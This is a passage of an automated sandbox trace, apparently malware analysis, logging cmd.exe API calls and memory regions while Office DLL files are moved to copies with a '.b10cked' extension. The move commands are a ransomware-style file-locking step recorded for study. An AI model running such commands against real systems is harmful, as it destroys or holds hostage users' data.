[0159.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" [0159.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.055] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0159.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.055] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0159.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0159.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0159.055] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0159.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0159.055] GetEnvironmentStringsW () returned 0x3f2360* [0159.055] FreeEnvironmentStringsW (penv=0x3f2360) returned 1 [0159.055] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.055] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.055] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0159.055] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0159.055] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0159.056] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0159.056] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0159.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f8b0, lpFilePart=0x24f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f8ac*="Desktop") returned 0x18 [0159.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: hFindFile=0x3f09f0) returned 1 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: hFindFile=0x3f09f0) returned 1 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: hFindFile=0x3f09f0) returned 1 [0159.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.057] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0159.057] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0159.057] GetEnvironmentStringsW () returned 0x3f0210* [0159.057] FreeEnvironmentStringsW (penv=0x3f0210) returned 1 [0159.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.057] GetConsoleOutputCP () returned 0x1b5 [0159.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.057] GetUserDefaultLCID () returned 0x409 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="0") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="0") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="1") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0159.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.059] GetConsoleTitleW (in: lpConsoleTitle=0x3e0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.059] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.059] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0159.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0159.060] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0159.060] _wcsicmp (_String1="move", _String2=")") returned 68 [0159.061] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0159.061] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0159.061] _wcsicmp (_String1="IF", _String2="move") returned -4 [0159.061] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0159.061] _wcsicmp (_String1="REM", _String2="move") returned 5 [0159.061] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0159.064] GetConsoleTitleW (in: lpConsoleTitle=0x24f6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.065] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0159.065] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0159.065] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0159.065] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0159.065] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="CD") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="REN") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="SET") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0159.066] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0159.066] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="MD") returned 11 [0159.066] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0159.066] _wcsicmp (_String1="move", _String2="RD") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0159.066] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0159.066] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0159.066] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0159.066] _wcsicmp (_String1="move", _String2="VER") returned -9 [0159.066] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0159.066] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0159.066] _wcsicmp (_String1="move", _String2="START") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0159.066] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0159.066] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0159.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.068] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f4a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f49c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f49c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0159.068] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0159.069] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0159.069] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl~1.trx")) returned 0x2020 [0159.070] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.070] SetErrorMode (uMode=0x0) returned 0x0 [0159.070] SetErrorMode (uMode=0x1) returned 0x0 [0159.070] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x24ee2c, lpFilePart=0x24ee14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", lpFilePart=0x24ee14*="STINTL~1.TRX") returned 0x3c [0159.070] SetErrorMode (uMode=0x0) returned 0x1 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0159.070] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0159.070] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl~1.trx")) returned 0x2020 [0159.070] SetErrorMode (uMode=0x0) returned 0x0 [0159.070] SetErrorMode (uMode=0x1) returned 0x0 [0159.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x24f2a8, lpFilePart=0x24f040 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", lpFilePart=0x24f040*="STINTL~1.TRX") returned 0x3c [0159.071] SetErrorMode (uMode=0x0) returned 0x1 [0159.071] SetErrorMode (uMode=0x0) returned 0x0 [0159.071] SetErrorMode (uMode=0x1) returned 0x0 [0159.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f4b0, lpFilePart=0x24f040 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x24f040*="STINTL.DLL.trx_dll.b10cked") returned 0x4a [0159.071] SetErrorMode (uMode=0x0) returned 0x1 [0159.071] SetLastError (dwErrCode=0x0) [0159.071] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll.b10cked")) returned 0xffffffff [0159.071] GetLastError () returned 0x2 [0159.071] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x24e9bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e9bc) returned 0x3f2128 [0159.071] FindNextFileW (in: hFindFile=0x3f2128, lpFindFileData=0x24e9bc | out: lpFindFileData=0x24e9bc) returned 0 [0159.072] GetLastError () returned 0x12 [0159.072] FindClose (in: hFindFile=0x3f2128 | out: hFindFile=0x3f2128) returned 1 [0159.073] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3f1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3f1cb8) returned 0x3f2128 [0159.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0159.073] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x24ec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0159.073] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll")) returned 0x2020 [0159.073] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\stintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0159.074] FindClose (in: hFindFile=0x3f2128 | out: hFindFile=0x3f2128) returned 1 [0159.074] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec08 | out: _Buffer=" 1") returned 9 [0159.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.074] GetFileType (hFile=0x7) returned 0x2 [0159.074] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24eb94 | out: lpMode=0x24eb94) returned 1 [0159.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ebc8 | out: lpConsoleScreenBufferInfo=0x24ebc8) returned 1 [0159.075] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0159.075] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ec08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0159.075] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ebec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ebec*=0x1a) returned 1 [0159.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.075] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.076] SetConsoleInputExeNameW () returned 0x1 [0159.076] GetConsoleOutputCP () returned 0x1b5 [0159.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.076] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.076] exit (_Code=0) Process: id = "270" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22020 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22021 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 22022 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 22023 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 22024 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22025 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22026 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22027 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22028 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22029 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22041 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22042 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22043 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22044 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22045 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 22046 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22047 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22049 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22050 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22051 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22052 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22053 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22054 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22055 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 22056 